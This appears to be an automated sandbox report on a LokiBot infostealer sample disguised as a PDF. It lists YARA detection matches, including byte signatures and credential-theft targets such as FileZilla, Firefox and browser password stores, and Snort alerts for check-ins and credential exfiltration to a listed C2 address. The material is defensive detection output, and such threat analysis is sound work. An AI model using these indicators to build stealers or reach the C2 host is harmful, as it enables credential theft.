3.0.cvtres.exe.400000.3.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
3.2.cvtres.exe.400000.0.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
3.2.cvtres.exe.400000.0.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
3.2.cvtres.exe.400000.0.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
3.2.cvtres.exe.400000.0.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
3.2.cvtres.exe.400000.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.cvtres.exe.400000.0.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
3.2.cvtres.exe.400000.0.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
3.2.cvtres.exe.400000.0.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
3.2.cvtres.exe.400000.0.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
3.2.cvtres.exe.400000.0.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
3.2.cvtres.exe.400000.0.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
3.2.cvtres.exe.400000.0.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
3.0.cvtres.exe.400000.4.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0x13e78:$s1: http:// 0x17633:$s1: http:// 0x13e80:$s2: https:// 0x18074:$s2: \x97\x8B\x8B\x8F\x8C\xC5\xD0\xD0 0x13e78:$f1: http:// 0x17633:$f1: http:// 0x13e80:$f2: https://
3.0.cvtres.exe.400000.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.0.cvtres.exe.400000.4.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
3.0.cvtres.exe.400000.4.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
3.0.cvtres.exe.400000.4.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
3.0.cvtres.exe.400000.4.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
3.0.cvtres.exe.400000.4.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
3.0.cvtres.exe.400000.5.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0x13e78:$s1: http:// 0x17633:$s1: http:// 0x13e80:$s2: https:// 0x18074:$s2: \x97\x8B\x8B\x8F\x8C\xC5\xD0\xD0 0x13e78:$f1: http:// 0x17633:$f1: http:// 0x13e80:$f2: https://
0.2.Project sheets.pdf.exe.41d5530.5.raw.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0x13e78:$s1: http:// 0x17633:$s1: http:// 0x13e80:$s2: https:// 0x18074:$s2: \x97\x8B\x8B\x8F\x8C\xC5\xD0\xD0 0x13e78:$f1: http:// 0x17633:$f1: http:// 0x13e80:$f2: https://
3.0.cvtres.exe.400000.4.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
3.0.cvtres.exe.400000.4.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
3.0.cvtres.exe.400000.5.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.0.cvtres.exe.400000.5.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.Project sheets.pdf.exe.41d5530.5.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Project sheets.pdf.exe.41d5530.5.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
3.0.cvtres.exe.400000.5.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
3.0.cvtres.exe.400000.5.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
3.0.cvtres.exe.400000.5.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
3.0.cvtres.exe.400000.5.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
3.0.cvtres.exe.400000.5.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
3.0.cvtres.exe.400000.5.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.Project sheets.pdf.exe.41d5530.5.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0.2.Project sheets.pdf.exe.41d5530.5.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
0.2.Project sheets.pdf.exe.41d5530.5.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.Project sheets.pdf.exe.41d5530.5.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.Project sheets.pdf.exe.41d5530.5.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0x13278:$s1: http:// 0x16233:$s1: http:// 0x13280:$s2: https:// 0x16c74:$s2: \x97\x8B\x8B\x8F\x8C\xC5\xD0\xD0 0x13278:$f1: http:// 0x16233:$f1: http:// 0x13280:$f2: https://
3.0.cvtres.exe.400000.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.0.cvtres.exe.400000.2.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
3.0.cvtres.exe.400000.2.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
3.0.cvtres.exe.400000.2.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
0.2.Project sheets.pdf.exe.41d5530.5.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.Project sheets.pdf.exe.41d5530.5.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
0.2.Project sheets.pdf.exe.41d5530.5.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.Project sheets.pdf.exe.41d5530.5.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.Project sheets.pdf.exe.41d5530.5.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
3.0.cvtres.exe.400000.2.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
3.0.cvtres.exe.400000.2.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.Project sheets.pdf.exe.41d5530.5.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
3.0.cvtres.exe.400000.2.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
3.0.cvtres.exe.400000.2.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.Project sheets.pdf.exe.41d5530.5.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
3.0.cvtres.exe.400000.5.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.0.cvtres.exe.400000.5.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
3.0.cvtres.exe.400000.5.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
3.0.cvtres.exe.400000.5.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
3.0.cvtres.exe.400000.5.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
3.0.cvtres.exe.400000.5.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
3.0.cvtres.exe.400000.5.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
3.0.cvtres.exe.400000.5.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
3.0.cvtres.exe.400000.0.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0x13e78:$s1: http:// 0x17633:$s1: http:// 0x13e80:$s2: https:// 0x18074:$s2: \x97\x8B\x8B\x8F\x8C\xC5\xD0\xD0 0x13e78:$f1: http:// 0x17633:$f1: http:// 0x13e80:$f2: https://
3.0.cvtres.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.0.cvtres.exe.400000.0.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
3.0.cvtres.exe.400000.0.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
3.0.cvtres.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
3.0.cvtres.exe.400000.0.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
3.0.cvtres.exe.400000.0.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
3.0.cvtres.exe.400000.0.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
3.0.cvtres.exe.400000.0.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
Click to see the 113 entries

Snort Signatures

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349852802025381 08/11/22-06:43:38.361573
SID:	2025381
Source Port:	49852
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349817802021641 08/11/22-06:43:11.901228
SID:	2021641
Source Port:	49817
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349782802825766 08/11/22-06:42:50.570997
SID:	2825766
Source Port:	49782
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349786802024313 08/11/22-06:42:53.219319
SID:	2024313
Source Port:	49786
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349805802024318 08/11/22-06:43:09.287221
SID:	2024318
Source Port:	49805
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349823802024313 08/11/22-06:43:13.321407
SID:	2024313
Source Port:	49823
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.96.3

Timestamp:	192.168.2.3188.114.96.349885802021641 08/11/22-06:43:55.376397
SID:	2021641
Source Port:	49885
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349753802024318 08/11/22-06:42:25.207102
SID:	2024318
Source Port:	49753
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.3

Timestamp:	192.168.2.3188.114.96.349760802024318 08/11/22-06:42:32.923604
SID:	2024318
Source Port:	49760
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349754802025381 08/11/22-06:42:26.308314
SID:	2025381
Source Port:	49754
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349805802024313 08/11/22-06:43:09.287221
SID:	2024313
Source Port:	49805
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.3

Timestamp:	192.168.2.3188.114.96.349884802825766 08/11/22-06:43:54.330408
SID:	2825766
Source Port:	49884
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.3

Timestamp:	192.168.2.3188.114.96.349760802024313 08/11/22-06:42:32.923604
SID:	2024313
Source Port:	49760
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.3

Timestamp:	192.168.2.3188.114.96.349888802024313 08/11/22-06:44:00.133246
SID:	2024313
Source Port:	49888
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349798802021641 08/11/22-06:43:06.576803
SID:	2021641
Source Port:	49798
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349838802024313 08/11/22-06:43:24.421881
SID:	2024313
Source Port:	49838
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349750802021641 08/11/22-06:42:21.832277
SID:	2021641
Source Port:	49750
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349895802825766 08/11/22-06:44:06.157277
SID:	2825766
Source Port:	49895
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.96.3

Timestamp:	192.168.2.3188.114.96.349744802021641 08/11/22-06:42:15.052087
SID:	2021641
Source Port:	49744
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349797802825766 08/11/22-06:43:05.379365
SID:	2825766
Source Port:	49797
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349743802024312 08/11/22-06:42:14.045456
SID:	2024312
Source Port:	49743
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349790802025381 08/11/22-06:42:56.651534
SID:	2025381
Source Port:	49790
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349830802021641 08/11/22-06:43:16.837786
SID:	2021641
Source Port:	49830
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349838802024318 08/11/22-06:43:24.421881
SID:	2024318
Source Port:	49838
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349867802025381 08/11/22-06:43:45.824252
SID:	2025381
Source Port:	49867
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349796802024318 08/11/22-06:43:04.193279
SID:	2024318
Source Port:	49796
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349796802024313 08/11/22-06:43:04.193279
SID:	2024313
Source Port:	49796
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349853802021641 08/11/22-06:43:40.660156
SID:	2021641
Source Port:	49853
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349890802825766 08/11/22-06:44:03.457387
SID:	2825766
Source Port:	49890
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349758802024318 08/11/22-06:42:30.656105
SID:	2024318
Source Port:	49758
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349761802024313 08/11/22-06:42:34.002289
SID:	2024313
Source Port:	49761
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349758802024313 08/11/22-06:42:30.656105
SID:	2024313
Source Port:	49758
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349778802024318 08/11/22-06:42:46.945645
SID:	2024318
Source Port:	49778
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349867802825766 08/11/22-06:43:45.824252
SID:	2825766
Source Port:	49867
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349761802024318 08/11/22-06:42:34.002289
SID:	2024318
Source Port:	49761
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349743802024317 08/11/22-06:42:14.045456
SID:	2024317
Source Port:	49743
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349754802825766 08/11/22-06:42:26.308314
SID:	2825766
Source Port:	49754
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349789802825766 08/11/22-06:42:55.412963
SID:	2825766
Source Port:	49789
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349896802021641 08/11/22-06:44:07.789189
SID:	2021641
Source Port:	49896
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

